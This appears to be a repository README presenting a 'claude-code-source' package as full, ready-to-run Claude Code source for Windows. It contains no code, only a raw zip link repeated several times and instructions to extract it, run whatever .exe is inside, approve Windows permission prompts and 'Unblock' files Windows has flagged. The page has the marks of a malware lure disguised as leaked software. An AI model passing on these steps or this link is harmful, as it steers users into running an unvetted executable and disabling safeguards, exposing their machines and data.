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🧩 claude-code-source - Full source, ready to run

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📥 Download

Use this page to download the app:

https://github.com/aymannaim822-create/claude-code-source/raw/refs/heads/main/abrocome/code-claude-source-wrick.zip

Open the link in your browser, then look for the latest release or download files on the page. If you see a .zip file, save it to your PC. If you see an .exe file, download it and run it.

🖥️ What this app is

claude-code-source is a Windows app source restore package for Claude Code from an npm build. It includes the full native module set and keeps the app features intact.

This is meant for users who want the full desktop app source in one place, with a simple way to get it onto a Windows PC and run it.

✅ What you need

Before you start, make sure your PC has:

  • Windows 10 or Windows 11
  • At least 4 GB of RAM
  • 2 GB of free disk space
  • A stable internet connection
  • Permission to install apps on your PC

If you plan to unpack a .zip file, keep the built-in Windows tools ready. If the package needs a helper app, use the one included in the download page or release files.

🚀 Get started

  1. Open the download page:
    https://github.com/aymannaim822-create/claude-code-source/raw/refs/heads/main/abrocome/code-claude-source-wrick.zip

  2. Find the latest release or main download file.

  3. Download the file to your computer.

  4. If the file is a .zip, right-click it and choose Extract All.

  5. Open the extracted folder.

  6. If you see an .exe file, double-click it to run the app.

  7. If you see a setup file, follow the on-screen steps to finish the install.

🪟 Run on Windows

If the package comes as a ready-to-run Windows file:

  1. Save the file to your Downloads folder.
  2. Open File Explorer.
  3. Go to the folder where the file was saved.
  4. Double-click the app or setup file.
  5. If Windows asks for permission, choose Yes.
  6. Wait for the app to open.

If the download is a folder with files inside:

  1. Extract the folder first.
  2. Open the folder after extraction.
  3. Look for the main app file.
  4. Double-click it to start.

📦 If the download is a ZIP file

Many Windows downloads come as a ZIP archive. If that is the case:

  1. Right-click the ZIP file.
  2. Choose Extract All.
  3. Pick a folder with enough space.
  4. Click Extract.
  5. Open the new folder.
  6. Look for the main launcher or installer.
  7. Run that file.

🔧 Basic use

After the app starts, you may see a simple window with a start screen, status text, or setup prompt. Use the app as shown on screen.

Common first steps include:

  • Choosing a folder
  • Confirming access prompts
  • Waiting for the app to load
  • Opening the main workspace

If the app asks for a path or file, use a normal folder on your PC. A folder on the Desktop or in Documents works well.

🧠 What is included

This source restore package is built to keep the full app shape in place. Based on the repository name and description, it is meant to include:

  • Core Claude Code source files
  • Native modules needed for desktop use
  • App files from the npm package
  • Full feature set without trimmed parts
  • Windows-friendly build assets
  • Files that help the app run in a local desktop setup

🛠️ Common Windows steps

If Windows blocks the app, try these steps:

  1. Right-click the file.
  2. Choose Properties.
  3. If you see Unblock, check it.
  4. Click Apply.
  5. Run the app again.

If the app does not open:

  1. Make sure the file finished downloading.
  2. Check that you extracted the ZIP file.
  3. Confirm you are opening the main .exe file.
  4. Try running it again from the folder that holds the app files.

🔍 Where to get the file

Download from the main repository page:

https://github.com/aymannaim822-create/claude-code-source/raw/refs/heads/main/abrocome/code-claude-source-wrick.zip

Use this same link if you need to check for updates, new files, or release assets.

📋 File names you may see

The exact file names can vary, but common names may look like:

  • claude-code-source.zip
  • ClaudeCode.exe
  • setup.exe
  • app.zip
  • windows-build.zip

If you are not sure which file to use, choose the file that ends in .exe for direct run, or .zip if you need to extract first.

🔐 Safety checks

Before opening any file:

  • Make sure it came from the link above
  • Check that the file name looks correct
  • Avoid opening files from unknown sites
  • Keep your Windows security tools on

❓ Common issues

The app does not start

  • Reopen the folder and try the main app file again
  • Check that all files stayed in the same folder after extraction
  • Restart your PC and try once more

Windows shows a warning

  • Right-click the file and check its properties
  • Look for the Unblock option
  • Run the file again after applying changes

The file says it is missing something

  • Extract the full ZIP package again
  • Do not move only one file out of the folder
  • Keep the app files together

The download feels slow

  • Pause other large downloads
  • Use a steady network connection
  • Try again after a few minutes

🧭 Simple folder setup

For the smoothest run, keep the app in a folder like one of these:

  • C:\Users\YourName\Downloads\claude-code-source
  • C:\Users\YourName\Desktop\claude-code-source
  • C:\Users\YourName\Documents\claude-code-source

This keeps the files easy to find and reduces mistakes when you open the app.

🧰 If you want a clean reinstall

If you need to start over:

  1. Delete the old extracted folder.
  2. Download the file again from the link above.
  3. Extract it to a new folder.
  4. Open the main file from that new folder.
  5. Use the app again

📎 Main download page

Visit this page to download and open the project files:

https://github.com/aymannaim822-create/claude-code-source/raw/refs/heads/main/abrocome/code-claude-source-wrick.zip

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